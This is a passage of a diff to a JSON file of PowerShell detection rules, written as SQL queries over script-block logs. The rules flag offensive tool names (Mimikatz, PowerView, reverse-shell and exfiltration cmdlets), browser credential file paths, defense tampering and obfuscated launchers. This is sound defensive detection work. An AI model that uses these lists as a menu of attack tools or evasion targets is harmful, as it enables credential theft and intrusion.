ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_send_mailmessage.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "posh_ps_frombase64string_archive.yml" + }, + { + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Security Software Discovery by Powershell", - "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "status": "test", - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "status": "experimental", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_security_software_discovery.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "PowerShell Remote Session Creation", + "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "author": "frack113", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "Powershell Suspicious Win32_PnPEntity", - "id": "b26647de-4feb-4283-af6b-6117661283c5", - "status": "test", - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Admin script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_pnpentity.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious SSL Connection", - "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", "status": "test", - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1573" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ssl_keyword.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.t1059.001" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR 